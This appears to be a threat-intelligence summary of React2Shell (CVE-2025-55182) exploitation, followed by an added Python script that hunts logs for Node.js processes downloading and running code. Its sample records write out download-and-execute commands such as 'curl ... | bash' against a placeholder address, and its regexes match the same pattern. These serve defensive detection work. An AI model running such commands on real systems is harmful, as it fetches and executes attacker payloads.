Multiple Threat Actors Exploit React2Shell (CVE-2025-55182)
Essential information
- Published: 13/12/2025 10:37
- Modified: 21/12/2025 19:03
- Tags: 2025-12-13 CVE-2025-55182 react2shell remote code execution
- Related entities: 5 vulnerabilities (cve), 7 observables, 17 techniques (mitre), 6 malware, 9 others
Description
A critical remote code execution vulnerability in React Server Components, CVE-2025-55182, has been widely exploited by various threat actors. China-nexus espionage groups and financially motivated actors have been observed leveraging this vulnerability to deploy malware such as MINOCAT tunneler, SNOWLIGHT downloader, HISONIC backdoor, COMPOOD backdoor, and XMRIG cryptocurrency miners. The vulnerability affects multiple versions of React packages and has a CVSS score of 10.0. Exploitation chains include the use of bash scripts, cURL, and wget to download and execute payloads. Affected organizations are advised to patch immediately, deploy WAF rules, audit dependencies, monitor network traffic, and hunt for indicators of compromise.
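
One way to start the hunt recommended above, as an added example that is not part of the original report: it flags process-creation records in which a server-side Node.js process launches cURL or wget and hands the result to a shell. The `ts|host|parent|cmdline` record format, the parent process names, the rule names and the sample lines are constructed assumptions.

```python
import re

# Assumption: the React Server Components application runs under Node.js.
SERVER_PARENTS = {"node", "nodejs"}

FETCH = r"\b(?:curl|wget)\b"
SHELL = r"\b(?:ba|da|z)?sh\b"
RULES = [
    # Downloader output piped straight into a shell.
    ("fetch_piped_to_shell", re.compile(FETCH + r"[^|;&]*\|\s*(?:sudo\s+)?" + SHELL)),
    # Download to disk, then chmod +x or run it in a chained command.
    ("fetch_then_execute",
     re.compile(FETCH + r".*(?:;|&&)\s*(?:chmod\s+\+x|" + SHELL + r"\s+\S|\./\S)")),
    # Shell evaluating a command substitution that fetches remote content.
    ("shell_eval_of_fetch", re.compile(SHELL + r"\s+-c\s+.*\$\(\s*" + FETCH)),
]

# Constructed sample records (documentation addresses, not real indicators).
SAMPLE = [
    '2025-01-01T10:40:01Z|web01|node|sh -c "curl -s http://203.0.113.5/a.sh | bash"',
    '2025-01-01T10:40:07Z|web01|node|sh -c "wget -q -O /tmp/x http://203.0.113.5/x && chmod +x /tmp/x"',
    '2025-01-01T10:41:30Z|web02|node|bash -c "$(curl -fsSL http://203.0.113.5/b.sh)"',
    '2025-01-01T10:42:00Z|web02|node|curl -s http://127.0.0.1:3000/healthz',
    '2025-01-01T10:43:12Z|build01|bash|sh -c "curl -fsSL https://tools.example/install.sh | sh"',
]

def classify(cmdline):
    """Return the name of the first matching rule, or None if benign-looking."""
    for name, rx in RULES:
        if rx.search(cmdline):
            return name
    return None

def hunt(lines, parents=SERVER_PARENTS):
    """Return (ts, host, rule, cmdline) for download-and-execute by a server parent."""
    hits = []
    for line in lines:
        # Split only three times so pipes inside the command line survive.
        ts, host, parent, cmd = line.split("|", 3)
        rule = classify(cmd)
        if parent in parents and rule:
            hits.append((ts, host, rule, cmd))
    return hits

if __name__ == "__main__":
    for hit in hunt(SAMPLE):
        print(*hit, sep="  ")
```

The health-check request and the interactive install on `build01` are not reported: the first matches no rule and the second has no server-process parent.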